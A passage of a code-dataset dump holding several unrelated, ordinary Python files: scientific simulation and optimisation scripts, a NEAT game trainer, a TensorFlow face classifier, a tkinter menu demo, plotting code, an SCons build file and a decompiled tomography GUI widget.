params_bounds_dict=PARAMS_BOUNDS_DICT,\n const_params_dict=const_params_dict0,\n exp_time_array=exp_time_array0,\n exp_x_array=EXP_X_ARRAY,\n exp_temp_array=exp_temp_array0,\n x_array=np.linspace(MIN_X, MAX_X, DIM_X),\n num_steps=num_steps0, time_step=TIME_STEP,\n finite_step_method=METHOD,\n sim_fpath=SIM_FPATH,\n )\n # write results file\n params_array = result.x\n with open(OPT_FPATH, 'w') as fw:\n fw.write(str(datetime.now()) + '\\n')\n fw.write('\\n')\n fw.write('Optimization of 1-dimensional parameters\\n')\n fw.write('\\n')\n fw.write('Optimized parameters:\\n')\n for param, val in zip(sorted(PARAMS_GUESS_DICT.keys()), params_array):\n fw.write(' {:24}= {}\\n'.format(param, val))\n fw.write('\\n')\n for name, item in result.items():\n if name == 'x':\n continue\n fw.write('{}:\\n'.format(name))\n fw.write('{}\\n'.format(item))\n fw.write('\\n')\n","sub_path":"enph257/simulations/src/opt_diffusion_1d_v2_June1_Run1.py","file_name":"opt_diffusion_1d_v2_June1_Run1.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"576933342","text":"import numpy\nimport bornagain as ba\nfrom bornagain import deg, angstrom, nm, kvector_t\nfrom matplotlib import pyplot as plt\nimport matplotlib\nmatplotlib.rcParams['image.cmap'] = 'jet'\n\n\ndef get_sample():\n # Defining Materials\n material_1 = ba.HomogeneousMaterial(\"example01_Air\", 0.0, 0.0)\n material_2 = ba.HomogeneousMaterial(\"Au\", 3.53665637e-05, 2.9383311e-06)\n material_3 = ba.HomogeneousMaterial(\"Si\", 5.73327e-06, 1.006366e-07)\n\n # Defining Layers\n layer_1 = ba.Layer(material_1)\n layer_2 = ba.Layer(material_3)\n\n # Defining Form Factors\n formFactor_1 = ba.FormFactorTruncatedSphere(159.0*nm, 244.0*nm, 106.0*nm)\n\n # Defining Particles\n particle_1 = ba.Particle(material_2, formFactor_1)\n particle_1_position = kvector_t(0.0*nm, 0.0*nm, 333.0*nm)\n particle_1.setPosition(particle_1_position)\n\n # Defining Particle Layouts and adding Particles\n layout_1 = ba.ParticleLayout()\n layout_1.addParticle(particle_1, 1.0)\n layout_1.setTotalParticleSurfaceDensity(0.01)\n\n # Adding layouts to layers\n layer_1.addLayout(layout_1)\n\n # Defining Multilayers\n multiLayer_1 = ba.MultiLayer()\n multiLayer_1.addLayer(layer_1)\n multiLayer_1.addLayer(layer_2)\n return multiLayer_1\n\n\ndef get_simulation():\n simulation = ba.GISASSimulation()\n \n detector = ba.RectangularDetector(981, 168.732, 1043, 179.396)\n detector.setPerpendicularToDirectBeam(3530.0, 104.558, 39.422)\n simulation.setDetector(detector)\n \n simulation.setDetectorResolutionFunction(ba.ResolutionFunction2DGaussian(0.043, 0.043))\n simulation.setBeamParameters(0.1341*nm, 0.2*deg, 0.0*deg)\n simulation.setBeamIntensity(5.0e+06)\n simulation.setTerminalProgressMonitor()\n simulation.setRegionOfInterest(40.0, 50.0, 160.0, 170.0)\n return simulation\n\n\ndef run_simulation():\n sample = get_sample()\n simulation = get_simulation()\n simulation.setSample(sample)\n simulation.runSimulation()\n return simulation.result()\n\n\ndef plot(result):\n plt.figure(figsize=(12.80, 10.24))\n plt.subplot()\n ba.plot_colormap(result, units=ba.AxesUnits.QSPACE, title=\"Q-space\",\n xlabel=r'$Q_{y} [1/nm]$', ylabel=r'$Q_{z} [1/nm]$', zmin=0.2, zmax=1e+5)\n plt.savefig('cup.jpg')\n\n\nif __name__ == '__main__':\n result = run_simulation()\n plot(result)","sub_path":"galaxi/Cap.py","file_name":"Cap.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"113927878","text":"import neat\nimport game\nimport random\nimport json\n\nSAVE_FILE = './save.json'\nNUM_GENERATIONS = 10000\nSAVE_BEST = 100\n\n\nclass NeatGame:\n def __init__(self, genome: neat.Genome):\n self.genome = genome\n self.g = game.Game()\n\n def move(self):\n outputs = {i: weight for i, weight in enumerate(\n self.genome.feedforward(self._get_inputs()))}\n\n for i, weight in sorted(outputs.items(), key=lambda x: x[1], reverse=True):\n if self.g.check_available(i):\n self.g.move(i)\n break\n\n def alive(self):\n return not self.g.game_over\n\n def assign_fitness(self):\n self.genome.fitness = self.g.score\n\n def fitness(self):\n return self.genome.fitness\n\n def print_board(self):\n self.g.print_board()\n\n def _get_inputs(self):\n return [i/32768 for i in self.g.flattened_board()]\n\n\nif __name__ == '__main__':\n n = neat.NEAT(16, 4)\n i = 0\n recent_best_genes = []\n highest_highest_fitness = 0\n highest_generation_fitness = 0\n while i < NUM_GENERATIONS:\n neat_games = [NeatGame(genome) for genome in n.genomes()]\n highest_fitness = 0\n for g in neat_games:\n while g.alive():\n g.move()\n g.assign_fitness()\n highest_fitness = max(highest_fitness, g.fitness())\n generation_fitness = n.generation_fitness\n print(\n f'Generation: {i} HighFitness: {highest_fitness} GenerationFitness: {generation_fitness}')\n if highest_fitness > highest_highest_fitness:\n highest_highest_fitness = highest_fitness\n recent_best_genes.append({\n 'generation': i,\n 'best_genome': sorted(n.genomes(), key=lambda genome: genome.fitness)[-1].as_list(),\n 'highest_fitness': highest_fitness,\n 'generation_fitness': generation_fitness\n })\n if len(recent_best_genes) > SAVE_BEST:\n recent_best_genes.pop(0)\n i += 1\n n.next_generation()\n\n # test and save\n # last_games = []\n # for genome in n.genomes():\n # g = NeatGame(genome)\n # while g.alive():\n # g.move()\n # g.assign_fitness()\n # last_games.append({\n # 'genome': g.genome.as_list(),\n # 'score': g.fitness()\n # })\n\n # last_games.sort(key=lambda g: g['score'])\n\n with open(SAVE_FILE, 'w') as save_file:\n save_file.write(json.dumps(recent_best_genes))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255061058","text":"import os # 디렉토리 경로 호출 용도\r\nimport cv2 # 이미지 파일 불러올 때 사용\r\nimport numpy as np # 다양한 행렬 연산 (데이터 처리) 용도\r\nfrom sklearn.preprocessing import LabelEncoder\r\n# 데이터 전처리 (문자로된 폴더 리스트를 숫자형 array로 변환)\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n# one-hot-encoding을 위해 OneHotEncoder 함수를 불러옴\r\nfrom numpy import array # 리스트를 array형태로 만들떄 사용하는 함수\r\nimport tensorflow as tf\r\nimport face_recognition\r\n\r\nIMAGE_SIZE = 64\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\nTRAIN_DIR = \"./gdrive/My Drive/train_data/\"\r\n\r\ntrain_folder_list = array(os.listdir(TRAIN_DIR))\r\n# print(train_folder_list)\r\n# ['elijah' 'taeim']\r\n\r\ntrain_input = []\r\ntrain_label = []\r\n\r\nlabel_encoder = LabelEncoder() # LabelEncoder Class 호출\r\n\r\n# 문자열로 구성된 train_folder_list를 숫자형 리스트로 변환\r\ninteger_encoded = label_encoder.fit_transform(train_folder_list) # 계수 추정과 자료 변환을 동시에\r\n# print(integer_encoded)\r\n# [0 1]\r\n\r\nonehot_encoder = OneHotEncoder(sparse=False)\r\n# print(onehot_encoder)\r\n# OneHotEncoder(categorical_features=None, categories=None,dtype=,\r\n# handle_unknown='error', n_values=None, sparse=False)\r\n\r\ninteger_encoded = integer_encoded.reshape(len(integer_encoded), 1)\r\n# OneHotEncoder를 사용하기 위해 integer_encoded의 shape을 (2,)에서 (2,1)로 변환\r\n# print(integer_encoded)\r\n# [[0]\r\n# [1]]\r\n\r\nonehot_encoded = onehot_encoder.fit_transform(integer_encoded)\r\n# OneHotEncoder를 사용하여 integer_encoded를 다음과 같이 변환하여 onehot_encoded 변수에 저장\r\n# print(onehot_encoded)\r\n# [[1. 0.]\r\n# [0. 1.]]\r\n\r\nfor index in range(len(train_folder_list)):\r\n path = os.path.join(TRAIN_DIR, train_folder_list[index])\r\n path = path + '/'\r\n img_list = os.listdir(path)\r\n print('train_img_list:', img_list)\r\n for img in img_list:\r\n img_path = os.path.join(path, img)\r\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\r\n train_input.append([np.array(img)]) # 이미지를 array 형태로 바꾸고 리스트에 넣음\r\n train_label.append([np.array(onehot_encoded[index])])\r\n\r\n\r\n# print(np.shape(train_input[0])) # (1, 64, 64)\r\ntrain_input = np.reshape(train_input, (-1, 4096))\r\n# print(np.shape(train_input[0])) # (4096,)\r\n# print(train_input.shape) # (8320, 4096)\r\n\r\n\r\n# print(np.shape(train_label[0])) # (1, 2)\r\ntrain_label = np.reshape(train_label, (-1, 2))\r\n# print(np.shape(train_label[0])) # (2,)\r\n# print(train_label.shape) # (8320, 2)\r\n\r\n\r\ntrain_input = np.array(train_input).astype(np.float32)\r\ntrain_label = np.array(train_label).astype(np.float32)\r\n\r\n\r\nTEST_DIR = \"./gdrive/My Drive/test_data/\"\r\ntest_folder_list = array(os.listdir(TEST_DIR))\r\n\r\ntest_input = []\r\ntest_label = []\r\n\r\nlabel_encoder = LabelEncoder()\r\ninteger_encoded = label_encoder.fit_transform(test_folder_list)\r\n\r\nonehot_encoder = OneHotEncoder(sparse=False)\r\ninteger_encoded = integer_encoded.reshape(len(integer_encoded), 1)\r\nonehot_encoded = onehot_encoder.fit_transform(integer_encoded)\r\n\r\n\r\nimg_save_list = []\r\ntop_list = []\r\nright_list = []\r\nbottom_list = []\r\nleft_list = []\r\n\r\nfor index in range(len(test_folder_list)):\r\n path = os.path.join(TEST_DIR, test_folder_list[index])\r\n path = path + '/'\r\n img_list = os.listdir(path)\r\n print('test_img_list:', img_list)\r\n\r\n for img in img_list:\r\n img_path = os.path.join(path, img)\r\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\r\n img_save_list.append(img)\r\n\r\n face_locations = face_recognition.face_locations(img)\r\n\r\n for j, face_location in enumerate(face_locations):\r\n top, right, bottom, left = face_location\r\n\r\n top_list.append(top)\r\n right_list.append(right)\r\n bottom_list.append(bottom)\r\n left_list.append(left)\r\n\r\n face_img = img[top:bottom, left:right]\r\n resized_img = cv2.resize(face_img, dsize=(IMAGE_SIZE, IMAGE_SIZE), interpolation=cv2.INTER_AREA)\r\n\r\n test_input.append([np.array(resized_img)]) # (60, 1, 64, 64)\r\n test_label.append([np.array(onehot_encoded[index])]) # (60, 1, 2)\r\n\r\ntest_input = np.reshape(test_input, (-1, 4096)) # (60, 4096)\r\ntest_label = np.reshape(test_label, (-1, 2)) # (60, 2)\r\ntest_input = np.array(test_input).astype(np.float32)\r\ntest_label = np.array(test_label).astype(np.float32)\r\n\r\n\r\n# set hyper parameters\r\nbatch_size = 128\r\nlearning_rate = 0.001\r\ntraining_epochs = 50\r\n\r\n# set random_seed\r\ntf.set_random_seed(1)\r\n\r\n\r\n# input placeholder of batch normalization\r\nbatch_prob = tf.placeholder(tf.bool)\r\nkeep_prob = tf.placeholder(tf.float32)\r\n\r\n\r\n# input placeholders\r\nX = tf.placeholder(dtype=tf.float32, shape=[None, 4096]) # 64x64=4096 [None, 4096] shape의 데이터를 불러올 수 있음\r\nX_img = tf.reshape(X, [-1, 64, 64, 1]) # img 64x64x1 (black/white)\r\nY = tf.placeholder(dtype=tf.float32, shape=[None, 2])\r\n\r\n\r\n################### Layer 1 ###################\r\nW1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev=0.01))\r\nL1 = tf.nn.conv2d(X_img, W1, strides=[1, 1, 1, 1], padding='SAME')\r\n# feature map: (64, 64, 1) 32개\r\nL1 = tf.layers.batch_normalization(L1, center=True, scale=True, training=batch_prob) # 배치정규화\r\nL1 = tf.nn.relu(L1) # 활성화 함수로 렐루 사용\r\nL1 = tf.nn.dropout(L1, keep_prob)\r\nL1 = tf.nn.max_pool(L1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n# 출력 feature map: (32, 32, 1) 32개\r\n\r\n\r\n################### Layer 2 ###################\r\nW2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01))\r\nL2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')\r\n# feature map: (32, 32, 1) 64개\r\nL2 = tf.layers.batch_normalization(L2, center=True, scale=True, training=batch_prob)\r\nL2 = tf.nn.relu(L2)\r\nL2 = tf.nn.dropout(L2, keep_prob)\r\nL2 = tf.nn.max_pool(L2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n# 출력 feature map: (16, 16, 1) 64개\r\n\r\n\r\n################### Layer 3 ###################\r\nW3 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev=0.01))\r\nL3 = tf.nn.conv2d(L2, W3, strides=[1, 1, 1, 1], padding='SAME')\r\n# feature map: (16, 16, 1) 128개\r\nL3 = tf.layers.batch_normalization(L3, center=True, scale=True, training=batch_prob)\r\nL3 = tf.nn.relu(L3)\r\nL3 = tf.nn.dropout(L3, keep_prob)\r\n# L3 = tf.nn.max_pool(L3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n\r\n\r\nL3_flat = tf.reshape(L3, [-1, 16 * 16 * 128]) # 다시 평평하게\r\nW4 = tf.get_variable(\"W4\", shape=[16 * 16 * 128, 2], initializer=tf.contrib.layers.xavier_initializer())\r\n\r\n\r\n# set bias of filter\r\nb = tf.Variable(tf.random_normal([2]))\r\nlogits = tf.matmul(L3_flat, W4) + b\r\n\r\n# define cost function\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y))\r\n# loss function을 최소화하는 경사하강법 종류 중 adam optimizer 을 사용\r\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n\r\n# initialize\r\nsess = tf.Session()\r\nsess.run(tf.global_variables_initializer()) # 모든 변수의 weight값을 초기화 합니다.\r\n# result = sess.run(W1)\r\n# print('필터:', result)\r\n\r\n\r\n# train my model\r\nprint('Learning started. It takes sometime.')\r\n\r\nfor epoch in range(training_epochs):\r\n avg_cost = 0\r\n total_batch = int(len(train_input) / batch_size) # 8320 / 128 = 65\r\n\r\n for i in range(total_batch):\r\n start = ((i + 1) * batch_size) - batch_size # 0, 128, 256..\r\n end = ((i + 1) * batch_size) # 128, 256, 512..\r\n batch_xs = train_input[start:end]\r\n batch_ys = train_label[start:end]\r\n feed_dict = {X: batch_xs, Y: batch_ys, batch_prob: True, keep_prob: 0.8}\r\n c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)\r\n avg_cost += c / total_batch\r\n\r\n if (epoch+1) % 10 == 0:\r\n print('Epoch:', '%04d' % (epoch + 1), ' cost =', '{:.9f}'.format(avg_cost))\r\n\r\nprint('Learning Finished!')\r\n\r\n\r\n# # Test model and check accuracy\r\n# correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(Y, 1))\r\n# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n# print('Accuracy:', sess.run(accuracy, feed_dict={X: test_input, Y: test_label, batch_prob: False, keep_prob: 1}))\r\n\r\n\r\n# Test model and check accuracy\r\ncorrect_prediction = logits\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\na = sess.run(correct_prediction, feed_dict={X: test_input, batch_prob: False, keep_prob: 1})\r\n\r\n\r\n# 소프트맥스 함수\r\ndef softmax(a):\r\n c = np.max(a)\r\n exp_a = np.exp(a - c)\r\n sum_exp_a = np.sum(exp_a)\r\n y = exp_a / sum_exp_a\r\n\r\n return y\r\n\r\n\r\npredict_result = []\r\n\r\nfor i in range(len(a)):\r\n predict_result.append(np.argmax(a[i]))\r\n\r\n\r\n# for i in range(len(a)):\r\n# sm = softmax(a[i])\r\n# print(a[i], sm)\r\n# predict_result.append(np.argmax(sm))\r\n\r\n\r\ncorrect = 0\r\n\r\nfor i in predict_result[:100]:\r\n if i == 0:\r\n correct += 1\r\n\r\nfor i in predict_result[100:]:\r\n if i == 1:\r\n correct += 1\r\n\r\nprint('acc:', round(correct/200 * 100, 2), '%')\r\nprint('not elijah:', predict_result[:100].count(0), '개 / 100개 맞춤', \"\\n\",\r\n 'elijah:', predict_result[100:].count(1), '개 / 100개 맞춤')\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"415816455","text":"from tkinter import *\nfrom tkinter import messagebox\n\nwindow = Tk()\nwindow.title(\"Practica de creación de menu\")\n\ndef infoAdicional():\n\tmessagebox.showinfo(\"Procesador de juan\", \"Procesador de textos version 2019\")\n\ndef avisoLicencia():\n\tmessagebox.showwarning(\"Licencia\", \"Producto bajo licencia GNU\")\n\ndef salirAplicacion():\n\t# valor = messagebox.askquestion(\"Salir\", \"¿Desea salir de la aplicación?\") # SI Y NO\n\t# if (valor == 'yes'):\n\t# \twindow.destroy()\n\n\tvalor = messagebox.askokcancel(\"Salir\", \"¿Desea salir de la aplicación?\") # OK Y CANCEL\n\tif (valor == True):\n\t\twindow.destroy()\n\ndef cerrarDocumento():\n\tvalor = messagebox.askretrycancel(\"Reintentar\", \"No es posible cerrar. Documento bloqueado\") # reintentar Y CANCEL\n\nbarraMenu = Menu(window)\nwindow.config(menu=barraMenu, width=300, height=300)\n\narchivoMenu = Menu(barraMenu, tearoff=0)\narchivoMenu.add_command(label=\"Nuevo\")\narchivoMenu.add_command(label=\"Guardar\")\narchivoMenu.add_command(label=\"Guardar como\")\narchivoMenu.add_separator()\narchivoMenu.add_command(label=\"Cerrar\", command=cerrarDocumento)\narchivoMenu.add_command(label=\"Salir\", command=salirAplicacion)\n\narchivoEdicion = Menu(barraMenu, tearoff=0)\narchivoEdicion.add_command(label=\"Copiar\")\narchivoEdicion.add_command(label=\"Cortar\")\narchivoEdicion.add_command(label=\"Pegar\")\n\narchivoHerramientas = Menu(barraMenu, tearoff=0)\narchivoAyuda = Menu(barraMenu, tearoff=0)\narchivoAyuda.add_command(label=\"Licencia\", command=avisoLicencia)\narchivoAyuda.add_command(label=\"Acerca de\", command=infoAdicional)\n\nbarraMenu.add_cascade(label=\"Archivo\", menu=archivoMenu)\nbarraMenu.add_cascade(label=\"Edicion\", menu=archivoEdicion)\nbarraMenu.add_cascade(label=\"Herramientas\", menu=archivoHerramientas)\nbarraMenu.add_cascade(label=\"Ayuda\", menu=archivoAyuda)\n\n\nwindow.mainloop()","sub_path":"53.GUI/ventanasEmergentes.pyw","file_name":"ventanasEmergentes.pyw","file_ext":"pyw","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"267510727","text":"import os\n\nsource = 'SplitShow.tex'\n\nenv = Environment(ENV = os.environ)\nenv.Append(BUILDERS = {'PDFOpen': Builder(action = 'open -a SplitShow $SOURCE', src_suffix = '.pdf')})\n\npdf = env.PDFOpen(env.PDF(source))\n\n# clean out beamer-specific files\nClean(pdf, [source.rsplit('.',1)[0] + ext for ext in Split('.nav .out .snm .toc')])\n","sub_path":"doc/screenshot/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"407818503","text":"#!/usr/bin/env python\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n h, city, data_y1, data_y2 = extract_data(sys.argv[1])\n\n plot_bar_graph(h, data_y1, data_y2, city)\n\ndef extract_data(path):\n city_name = []\n year1_data = []\n year2_data = []\n \n in_file = open(path)\n header = in_file.next()\n \n for row in in_file: \n row = row.strip(\"\\n\").split(\",\")\n city_name.append(row[0])\n year1_data.append(int(row[1]))\n year2_data.append(int(row[2]))\n\n return header, city_name, year1_data, year2_data \n\ndef plot_bar_graph(header, data1, data2, city):\n num_bars = len(data1)\n bar_loc = np.arange(num_bars)\n bar_wid = 0.15\n\n fig, ax = plt.subplots()\n\n r1 = ax.bar(bar_loc, data1, bar_wid, color='y')\n r2 = ax.bar(bar_loc + bar_wid, data1, bar_wid, color='b')\n\n # add some text for labels, title and axes ticks\n ax.set_ylabel('ELECTRICITY')\n ax.set_title(' Bar chart of electricity supply in 1996 and 2011')\n ax.set_xticklabels(city)\n ax.legend((r1[0], r2[0]), ('1996', '2011'))\n fig.autofmt_xdate() \n plt.tight_layout()\n plt.show()\n\nif __name__ == \"__main__\":\n main()\nelse: pass\n","sub_path":"Py/DATAMANIPUlATION/Data_Processing_and_Plotting01/plot_electricity.py","file_name":"plot_electricity.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595851114","text":"from Прочее.truck import Truck\n\nclass NotMachineLikeTruckAcceptableInGarage:\n\n text = '''\n !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n !!! Only truck acceptable to insert in garage {} !!!!!!\n !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotMachineLikeTruckAcceptableInGarage.text.format(message)\n\nclass Garage:\n\n def __init__(self, number, volume, list1, list2):\n self.number = number\n self.volume = volume\n self.cars_list = list1\n self.trucks_list = list2\n\n def setTrucks(self, trucks):\n for truck in trucks:\n if (isinstance(truck, Truck)):\n self.trucks_list.append(truck)\n else:\n raise NotMachineL","sub_path":"pvinogradov/Cls/garage.py","file_name":"garage.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473489770","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /users/payno/.local/share/virtualenvs/tomwer_venc/lib/python3.7/site-packages/tomwer/gui/reconstruction/ftserie/reconsparamseditor/paganinwidget.py\n# Compiled at: 2019-12-11 09:05:53\n# Size of source mod 2**32: 14605 bytes\n__author__ = [\n 'H. Payno']\n__license__ = 'MIT'\n__date__ = '10/01/2018'\nfrom silx.gui import qt\nfrom tomwer.core.log import TomwerLogger\nfrom tomwer.core.process.reconstruction.ftseries.params.paganin import PaganinMode\nfrom tomwer.core.utils.char import BETA_CHAR, DELTA_CHAR\nfrom tomwer.gui.reconstruction.ftserie.h5editor import H5StructEditor\nfrom tomwer.gui.utils.inputwidget import SelectionLineEdit\nfrom tomwer.synctools.ftseries import _QPaganinRP, QReconsParams\nlogger = TomwerLogger(__name__)\n\nclass PaganinWidget(H5StructEditor, qt.QWidget):\n __doc__ = '\\n Definition of the tab enabling Paganin reconstruction parameters edition\\n\\n :param reconsparams: reconstruction parameters edited by the widget\\n '\n\n def __init__(self, reconsparams, parent=None):\n qt.QWidget.__init__(self, parent=parent)\n H5StructEditor.__init__(self, structID='PAGANIN')\n self._recons_params = None\n self.setReconsParams(recons_params=reconsparams)\n self._groupHideIfNotMulti = []\n self._groupHideIfOff = []\n self.setLayout(qt.QVBoxLayout())\n self._PaganinWidget__buildMode()\n self._PaganinWidget__buildUnsharp()\n self._PaganinWidget__buildThreshold()\n self._PaganinWidget__buildDilate()\n self._PaganinWidget__buildMedianMedianFilterSize()\n self._PaganinWidget__buidMKeep()\n self._PaganinWidget__updatePaganinMode(0)\n spacer = qt.QWidget(self)\n spacer.setSizePolicy(qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n self.layout().addWidget(spacer)\n self._makeConnection()\n\n def setReconsParams(self, recons_params):\n if isinstance(recons_params, QReconsParams):\n _recons_params = recons_params.paganin\n else:\n if isinstance(recons_params, _QPaganinRP):\n _recons_params = recons_params\n else:\n raise ValueError('recons_params should be an instance of QReconsParam or _QPaganinRP')\n if self._recons_params:\n self._recons_params.sigChanged.disconnect(self._update_params)\n self._recons_params = _recons_params\n self.load(self._recons_params)\n self._recons_params.sigChanged.connect(self._update_params)\n\n def _update_params(self):\n \"\"\"Update all parameter\"\"\"\n self.load(self._recons_params)\n\n def clear(self):\n pass\n\n def _makeConnection(self):\n self._qcbpaganin.currentIndexChanged.connect(self._modeChanged)\n self._qleSigmaBeta.editingFinished.connect(self._DBChanged)\n self._qleSigmaBeta2.editingFinished.connect(self._DB2Changed)\n self._unsharp_sigma_coeff.editingFinished.connect(self._unsharpCoeffChanged)\n self._unsharp_sigma_mask_value.editingFinished.connect(self._unsharpSigmachanged)\n self._qleThreshold.editingFinished.connect(self._thresholdChanged)\n self._qleDilatation.editingFinished.connect(self._dilateChanged)\n self._qleMedianFilterSize.editingFinished.connect(self._medianRChanged)\n self._qcbKeepBone.toggled.connect(self._keepBoneChanged)\n self._qcbKeepSoft.toggled.connect(self._keepSoftChanged)\n self._qcbKeepAbs.toggled.connect(self._keepAbsChanged)\n self._qcbKeepCorr.toggled.connect(self._keepCorrChanged)\n self._qcbKeepMask.toggled.connect(self._keepMaskChanged)\n\n def __buildMode(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QGridLayout())\n self._qcbpaganin = qt.QComboBox(self)\n self._qcbpaganin.setSizePolicy(qt.QSizePolicy.Expanding, qt.QSizePolicy.Minimum)\n for mode in PaganinMode:\n self._qcbpaganin.addItem(mode.name)\n\n widget.layout().addWidget(qt.QLabel('Mode', parent=widget), 0, 0)\n widget.layout().addWidget(self._qcbpaganin, 0, 1)\n self._qcbpaganin.currentIndexChanged.connect(self._PaganinWidget__updatePaganinMode)\n self.linkComboboxWithH5Variable((self._qcbpaganin), 'MODE',\n fitwithindex=True)\n self._buildAlphaBetaWidgets(widget)\n self.layout().addWidget(widget)\n self._groupHideIfOff.append(self.paganinModeOpt)\n\n def _buildAlphaBetaWidgets(self, widget):\n self.paganinModeOpt = qt.QWidget(widget)\n self.paganinModeOpt.setLayout(qt.QGridLayout())\n label = DELTA_CHAR + ' / ' + BETA_CHAR\n self.paganinModeOpt.layout().addWidget(qt.QLabel(label, parent=widget), 1, 0)\n self._qleSigmaBeta = qt.QLineEdit('0', self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta, 1, 1)\n self.LinkLineEditWithH5Variable(self._qleSigmaBeta, 'DB', float)\n label_multi = DELTA_CHAR + ' / ' + BETA_CHAR + ' (multi)'\n lMulti = qt.QLabel(label_multi, parent=widget)\n self.paganinModeOpt.layout().addWidget(lMulti)\n self._qleSigmaBeta2 = qt.QLineEdit('0', self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta2, 2, 1)\n self.LinkLineEditWithH5Variable(self._qleSigmaBeta2, 'DB2', float)\n self._groupHideIfNotMulti.append(lMulti)\n self._groupHideIfNotMulti.append(self._qleSigmaBeta2)\n widget.layout().addWidget(self.paganinModeOpt, 1, 1)\n\n def _modeChanged(self):\n value = self._qcbpaganin.currentIndex()\n assert isinstance(self._recons_params, _QPaganinRP)\n self._recons_params['MODE'] = value\n\n def _DBChanged(self):\n value = float(self._qleSigmaBeta.text())\n self._recons_params['DB'] = value\n\n def _DB2Changed(self):\n value = float(self._qleSigmaBeta2.text())\n self._recons_params['DB2'] = value\n\n def __buildUnsharp(self):\n self._unsharp_group = qt.QGroupBox(title='unsharp mask parameters', parent=self)\n self.layout().addWidget(self._unsharp_group)\n self._unsharp_group.setLayout(qt.QGridLayout())\n label = 'mask ' + DELTA_CHAR + ' value in pixels'\n self._unsharp_group.layout().addWidget(qt.QLabel(label), 0, 0)\n self._unsharp_sigma_coeff = qt.QLineEdit('0', self._unsharp_group)\n self._unsharp_group.layout().addWidget(self._unsharp_sigma_coeff, 0, 1)\n self.LinkLineEditWithH5Variable(self._unsharp_sigma_coeff, 'UNSHARP_COEFF', float)\n self._unsharp_group.layout().addWidget(qt.QLabel('coefficient '), 1, 0)\n self._unsharp_sigma_mask_value = qt.QLineEdit('0', self._unsharp_group)\n validator = qt.QDoubleValidator(parent=(self._unsharp_sigma_mask_value))\n self._unsharp_sigma_mask_value.setValidator(validator)\n self._unsharp_group.layout().addWidget(self._unsharp_sigma_mask_value, 1, 1)\n self.LinkLineEditWithH5Variable(self._unsharp_sigma_mask_value, 'UNSHARP_SIGMA', float)\n self.layout().addWidget(self._unsharp_group)\n self._groupHideIfOff.append(self._unsharp_group)\n\n def _unsharpCoeffChanged(self):\n value = float(self._unsharp_sigma_coeff.text())\n self._recons_params['UNSHARP_COEFF'] = value\n\n def _unsharpSigmachanged(self):\n value = float(self._unsharp_sigma_mask_value.text())\n self._recons_params['UNSHARP_SIGMA'] = value\n\n def __buildThreshold(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QHBoxLayout())\n widget.layout().addWidget(qt.QLabel('Threshold for high absorption mask', parent=widget))\n self._qleThreshold = qt.QLineEdit('0', widget)\n widget.layout().addWidget(self._qleThreshold)\n self.LinkLineEditWithH5Variable(self._qleThreshold, 'THRESHOLD', float)\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _thresholdChanged(self):\n value = float(self._qleThreshold.text())\n self._recons_params['THRESHOLD'] = value\n\n def __buildDilate(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QHBoxLayout())\n widget.layout().addWidget(qt.QLabel('Dilatation to cover the dark fringes', parent=widget))\n self._qleDilatation = qt.QLineEdit('0', parent=widget)\n widget.layout().addWidget(self._qleDilatation)\n self.LinkLineEditWithH5Variable(self._qleDilatation, 'DILATE', int)\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n 